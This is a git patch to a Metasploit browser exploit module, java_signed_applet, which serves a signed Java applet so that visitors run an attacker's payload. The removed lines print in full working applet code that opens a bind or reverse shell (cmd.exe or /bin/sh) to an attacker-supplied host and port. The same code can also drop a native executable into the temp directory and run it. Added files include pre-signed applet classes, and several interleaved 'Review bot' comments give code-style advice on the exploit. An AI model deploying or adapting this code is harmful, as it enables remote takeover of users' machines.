From 191c4e8eb77272912aa130c8d6ff9f8cc884db73 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 30 Nov 2010 03:50:40 +0000 Subject: [PATCH] make java_signed_applet work with generic java payloads, but keep the default target as Windows/x86 since it is by far the most common victim. git-svn-id: file:///home/svn/framework3/trunk@11172 4d416f70-5f16-0410-b530-b9f4589650da --- data/exploits/java_signed_applet.jar | Bin 5304 -> 0 bytes .../java_signed_applet/META-INF/MANIFEST.MF | 9 + .../java_signed_applet/META-INF/SIGNFILE.DSA | Bin 0 -> 1084 bytes .../java_signed_applet/META-INF/SIGNFILE.SF | 11 + .../metasploit/Payload.class | Bin 0 -> 8177 bytes .../metasploit/PayloadApplet.class | Bin 0 -> 339 bytes .../src/metasploit/PayloadApplet.java | 14 + .../multi/browser/java_signed_applet.rb | 413 +++--------------- 8 files changed, 101 insertions(+), 346 deletions(-) delete mode 100644 data/exploits/java_signed_applet.jar create mode 100644 data/exploits/java_signed_applet/META-INF/MANIFEST.MF create mode 100644 data/exploits/java_signed_applet/META-INF/SIGNFILE.DSA create mode 100644 data/exploits/java_signed_applet/META-INF/SIGNFILE.SF create mode 100644 data/exploits/java_signed_applet/metasploit/Payload.class create mode 100644 data/exploits/java_signed_applet/metasploit/PayloadApplet.class create mode 100644 external/source/javapayload/src/metasploit/PayloadApplet.java 
diff --git a/data/exploits/java_signed_applet.jar b/data/exploits/java_signed_applet.jar deleted file mode 100644 index 1d210de53640763c7c719003d067df9c915bee04..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 5304 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 Mw`$XOz^~mu0Pp!MyZ`_I diff --git a/data/exploits/java_signed_applet/META-INF/MANIFEST.MF b/data/exploits/java_signed_applet/META-INF/MANIFEST.MF new file mode 100644 index 0000000000..362a05b2de --- /dev/null +++ b/data/exploits/java_signed_applet/META-INF/MANIFEST.MF @@ -0,0 +1,9 @@ +Manifest-Version: 1.0 +Created-By: 1.6.0_18 (Sun Microsystems Inc.) + +Name: metasploit/PayloadApplet.class +SHA1-Digest: X/L7jWCXGQGhITfOvpnJg+jgUZM= + +Name: metasploit/Payload.class +SHA1-Digest: KbAIMttBcLp1zCewA2ERYkcnRU8= + diff --git a/data/exploits/java_signed_applet/META-INF/SIGNFILE.DSA b/data/exploits/java_signed_applet/META-INF/SIGNFILE.DSA new file mode 100644 index 0000000000000000000000000000000000000000..433f92bb192e6f4694505530c26a706e49af8efd GIT binary patch literal 1084 zcmXqLVzFT3)N1o+`_9YA&a|M3Mbn^(MU{z>(U9AKlZ{oIkC{n|mBD};p@?xo6SKZS z6SKBK6VuBD%uI|-Oe{Wc=Qjb>umcS`XTib@)KCf5&m79aCd?EX4C8PJGlfJL@*D87 z0cF^Q*&IuYOEU8eB@Dzs0$jrUzNsaN#RWO}nI$?3K0eMc8E%|1%os8Ta^k#(28M=4 zCPv0a76wL9K(3*I5fDJQ1L?FT#_a}8j5@G@Vgz#JnHn1z{?-RK%9aXg2Hp3Xqxa^? z^KXLNgKXZrFdUY%Z`c;7mgySnpcME!(zZ9^*Z!klcNu&;Jv%h#dZTrNtV#Z-w1n;1 zGXs_`nLqypOSOQ~A^+Vgum9VAO!|j)`14~cmWlGS{BHhs`Ka7sCesk%D6xq~-%3BP z(@wmu_5PC*v*g^19*oDCL>ZQ_-Kd;Z$Hmz z)N^9lLmRQG?vR>ZjR%X@$!Tw1Ryr|naXt4hMbo5@zmuvMRjkh}`M7UI;DpW<&G#Qh zJ)O@ssXHyMp*mDGh0(|Q-+50h=EfEVrpAUC4G~63uCvvzVwlB3wVv&r@q6(c0X8$P zuFLX@94_ab9o{tkeOSTx`&fyui!FDr<-FV%xqXavAGSC2&OE+PBlJ+sw(|Aj2XjtM z>Ub=)&jWLnL1W_prax##MakFDJj=++z@i886mMd}w7>11<$~M+c_*K3 heeGfPXf=~ao#}VBgt?W9TB*yfW-O8p&Pr3@0syXmXea;x literal 0 HcmV?d00001 diff --git a/data/exploits/java_signed_applet/META-INF/SIGNFILE.SF b/data/exploits/java_signed_applet/META-INF/SIGNFILE.SF new file mode 100644 index 0000000000..9e3e356392 --- /dev/null +++ b/data/exploits/java_signed_applet/META-INF/SIGNFILE.SF 
@@ -0,0 +1,11 @@
+Signature-Version: 1.0
+SHA1-Digest-Manifest-Main-Attributes: s1TdOxe3gzjQrMmw0MCPecT0Dpk=
+Created-By: 1.6.0_18 (Sun Microsystems Inc.)
+SHA1-Digest-Manifest: /3/N9PvurH7pif9Ej6Ki35dLu2A=
+
+Name: metasploit/PayloadApplet.class
+SHA1-Digest: y6+heNFX7iv2UtUFv9ziltcUeAs=
+
+Name: metasploit/Payload.class
+SHA1-Digest: 70nbz45oAy6s9DR1vxQIhIxgzLc=
+
diff --git a/data/exploits/java_signed_applet/metasploit/Payload.class b/data/exploits/java_signed_applet/metasploit/Payload.class new file mode 100644 index 0000000000000000000000000000000000000000..c1e8e9d384174116bbe7705ae68a2a585db92578 GIT binary patch literal 8177 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 n^uPg{h#kP}0DUp`r3spV`47Ajz zdoBVJSKMf3XLo16zCS+U;|PNYO>9Pp(Nfro(8jhxN1;n-p6FcLQ-VL*zaj+Z#ViwW zVhn{)p%-HZyM*2yKXPI?pC=bjX;xZYjXJ=(;GE3;z zja;*2E&lh*+6C*J&>vlof0s>crSti*OZO+j^tLLNd}AbRyA*?+SWfS!6{i`7Xvn?p uc_4R${2RhLf+W~Dcmu6mU1+o}4~2Q6wdft*3&Qc?D}q(s5y%wZ`F{ZD5Jv0( literal 0 HcmV?d00001 diff --git a/external/source/javapayload/src/metasploit/PayloadApplet.java b/external/source/javapayload/src/metasploit/PayloadApplet.java new file mode 100644 index 0000000000..6cb6a80a01 --- /dev/null +++ b/external/source/javapayload/src/metasploit/PayloadApplet.java @@ -0,0 +1,14 @@ + +package metasploit; + +import java.applet.*; + +public class PayloadApplet extends Applet { + public void init() { + try { + Payload.main(null); + } catch (Exception ex) { + ex.printStackTrace(); + } + } +} diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index cc4607be6c..7499758821 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb 
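Review bot: PayloadApplet carries no class comment, yet the module changed in this same commit ships a pre-signed copy of this class (data/exploits/java_signed_applet/metasploit/PayloadApplet.class, digests in META-INF/SIGNFILE.SF), so any edit to this source or to Payload must be followed by re-signing or the shipped jar stops matching. A one-line javadoc above the class would make that dependency visible: `/** Applet entry point that delegates to Payload.main. The compiled class is shipped pre-signed under data/exploits/java_signed_applet; rebuild and re-sign whenever this file or Payload changes. */`. The file also opens with an empty line before `package metasploit;`, which is unusual and can be dropped.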
@@ -46,23 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote
 [
 [ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
 ],
- 'Platform' => [ 'win', 'osx', 'linux', 'solaris' ],
- 'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true },
+ 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
+ 'Payload' => { 'BadChars' => '', 'DisableNops' => true },
 'Targets' =>
 [
- # Generic java payload is mostly useless right now, as it kills as soon as the user browses
- # to another page. It should be rewritten to launch a new JVM in the background with a custom
- # .class.
- #
- # Look up the path to bin/java, dump .class to java.io.tmpdir, then bin/java foo.class via
- # /bin/sh or cmd.exe
 [ 'Generic (Java Payload)',
 {
- # This is a bad hack to force only the generic/shell_bind_tcp
- # and generic/shell_reverse_tcp payloads
- 'Platform' => ['win'],
- 'Payload' => { 'Space' => 0 },
- 'Arch' => ARCH_CMD,
+ 'Platform' => ['java'],
+ 'Arch' => ARCH_JAVA
 }
 ],
 [ 'Windows x86 (Native Payload)',
@@ -71,6 +62,12 @@ class Metasploit3 < Msf::Exploit::Remote
 'Arch' => ARCH_X86,
 }
 ],
+ [ 'Linux x86 (Native Payload)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ }
+ ],
 [ 'Mac OS X PPC (Native Payload)',
 {
 'Platform' => 'osx',
@@ -83,12 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Arch' => ARCH_X86,
 }
 ],
- [ 'Linux x86 (Native Payload)',
- {
- 'Platform' => 'linux',
- 'Arch' => ARCH_X86,
- }
- ],
 ],
 'DefaultTarget' => 1
 ))
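Review bot: Moving the 'Linux x86 (Native Payload)' entry ahead of the OS X targets (hunks @@ -71,6 and @@ -83,12) renumbers targets 2 through 4, so anything that selects a target by index rather than by name will now resolve to a different platform; 'DefaultTarget' => 1 still lands on Windows x86 as the commit message intends, but nothing in the table says that position is load-bearing. A trailing comment, `'DefaultTarget' => 1 # Windows x86 (Native Payload)`, would protect it from the next reorder. In the first hunk `'Arch' => ARCH_JAVA` drops the trailing comma that every sibling entry keeps; `'Arch' => ARCH_JAVA,` keeps the hash literals uniform.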
@@ -109,245 +100,15 @@ class Metasploit3 < Msf::Exploit::Remote end - def exploit - # - # Currently doing all processing in on_request_uri. - # If this is too slow, we can move applet generation up here. - # - - @use_static = false - - if not @jvm_init - print_error - print_error "The JDK failed to initialized: #{@java_error}" - print_error "In order to dynamically sign the applet, you must install the Java Development Kit, the rjb gem, and set the JAVA_HOME environment variable." - print_error - print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored." - print_error - @use_static = true - end - - if datastore['SaveToFile'] - appletsource = get_code - save_to_file( appletsource['classnames'], appletsource['codefiles'], datastore['SaveToFile'] ) - end - - super - end - - def get_code - - appletsource = <<-EOF -import java.applet.Applet; -import java.io.ByteArrayInputStream; -import java.io.ObjectInputStream; -import java.io.BufferedReader; -import java.io.BufferedWriter; -import java.io.File; -import java.io.FileOutputStream; -import java.io.InputStream; -import java.io.InputStreamReader; -import java.io.OutputStream; -import java.io.OutputStreamWriter; -import java.net.ServerSocket; -import java.net.Socket; -import java.security.AccessController; -import java.security.PrivilegedExceptionAction; - -public class #{datastore['APPLETNAME']} extends Applet -{ - - public void init() - { - try - { - String data = getParameter( "data" ); - String lhost = getParameter( "lhost" ); - String lport = getParameter( "lport" ); - - if( data == null ) { - data = ""; - } - - //System.out.println("Applet executing. 
Creating payload class."); - - #{datastore['PAYLOADNAME']} site = new #{datastore['PAYLOADNAME']} (); - //System.out.println("Payload class instantiated."); - site.data = data; - - if( lhost != null && lport != null) { - site.lhost = lhost; - site.lport = Integer.parseInt(lport); - System.out.println("lhost: " + lhost); - System.out.println("lport: " + Integer.parseInt(lport)); - } - - //System.out.println("data: " + data); - - site.run(); - } - catch( Exception e ) { System.out.println("Applet error: " + e); } - } - - class #{datastore['PAYLOADNAME']} implements PrivilegedExceptionAction - { - // This will contain a hex string of the native payload to drop and execute. - public String data = null; - // If no native payload is set we get either a java bind shell or a java - // reverse shell. - public String lhost = null; - public int lport = 4444; - - class StreamConnector extends Thread - { - InputStream is; - OutputStream os; - - StreamConnector( InputStream is, OutputStream os ) - { - this.is = is; - this.os = os; - } - - public void run() - { - BufferedReader in = null; - BufferedWriter out = null; - - try - { - in = new BufferedReader( new InputStreamReader( is ) ); - out = new BufferedWriter( new OutputStreamWriter( os ) ); - char buffer[] = new char[8192]; - int length; - while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) - { - out.write( buffer, 0, length ); - out.flush(); - } - } - catch( Exception e ) { System.out.println( "StreamConnector error: " + e); } - - try - { - if( in != null ) - in.close(); - if( out != null ) - out.close(); - } - catch( Exception e ) { System.out.println( "StreamConnector error: " + e); } - } - } - - // http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java - public byte[] StringToBytes( String s ) - { - byte[] data = new byte[s.length() / 2]; - - for( int i = 0 ; i < s.length() ; i += 2 ) - data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) 
+ Character.digit( s.charAt( i + 1 ), 16 ) ); - - return data; - } - - public Object run() throws Exception - { - //System.out.println("Applet running..."); - - try - { - String os = System.getProperty( "os.name" ); - - // if we have no native payload to drop and execute we default to - // either a TCP bind or reverse shell. - //if( #{datastore['PAYLOADNAME']}.data.length() == 0 ) - if( this.data.length() == 0 ) - { - //System.out.println("Applet thinks payload.data is empty."); - Socket client_socket = null; - - String shell = "/bin/sh"; - - if( os.indexOf( "Windows" ) >= 0 ) - shell = "cmd.exe"; - - //if( #{datastore['PAYLOADNAME']}.lhost == null ) - if( this.lhost == null ) - { - //ServerSocket server_socket = new ServerSocket( #{datastore['PAYLOADNAME']}.lport ); - ServerSocket server_socket = new ServerSocket( this.lport ); - client_socket = server_socket.accept(); - } - else - { - //client_socket = new Socket( #{datastore['PAYLOADNAME']}.lhost, #{datastore['PAYLOADNAME']}.lport ); - client_socket = new Socket( this.lhost, this.lport ); - } - - if( client_socket != null ) - { - Process process = Runtime.getRuntime().exec( shell ); - - ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); - - ( new StreamConnector( process.getErrorStream(), client_socket.getOutputStream() ) ).start(); - - ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); - } - } - else - { - //System.out.println("Applet knows there's data to write. 
Writing to: " + System.getProperty( "java.io.tmpdir" )); - String filename = Math.random() + ".exe"; - String path = System.getProperty( "java.io.tmpdir" ) + File.separator + filename; - //System.out.println(filename + " written."); - - Process p; - FileOutputStream fos = new FileOutputStream( path ); - - //fos.write( StringToBytes( #{datastore['PAYLOADNAME']}.data ) ); - fos.write( StringToBytes( this.data ) ); - - fos.close(); - - if( os.indexOf( "Windows" ) < 0 ) - { - p = Runtime.getRuntime().exec( "chmod 755 " + path ); - p.waitFor(); - } - - p = Runtime.getRuntime().exec( path ); - - p.waitFor(); - - new File( path ).delete(); - } - } - catch( Exception e ) { System.out.println("Payload execution error: " + e); } - - return null; - } - - public void #{datastore['PAYLOADNAME']}() - { - try - { - AccessController.doPrivileged( this ); - } - catch( Exception e ) { System.out.println("Payload instantiation error: " + e); } - } - } -} -EOF - appletcode = { - 'classnames' => [ datastore['APPLETNAME'] ], - 'codefiles' => [ appletsource ] - } - - return appletcode - end - def on_request_uri( cli, request ) + payload = regenerate_payload(cli) + if not payload + print_error( "Failed to generate the payload." ) + # Send them a 404 so the browser doesn't hang waiting for data + # that will never come. + send_not_found(cli) + return + end if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) 
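Review bot: The `payload` that the new lines obtain from `regenerate_payload(cli)` at the top of on_request_uri is only ever tested for nil, while the jar branch later in the same method (hunk @@ -357,108) calls `regenerate_payload(cli)` a second time and dereferences its result with `p.encoded_jar` without the nil guard this hunk adds. Depending on how regenerate_payload behaves, two calls for one request may also yield two differently encoded payloads. Reusing the checked value there, `jar = payload.encoded_jar`, removes both the duplicate call and the unguarded dereference. `if not payload` reads more naturally as `unless payload`. on_request_uri continues past the end of this hunk.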
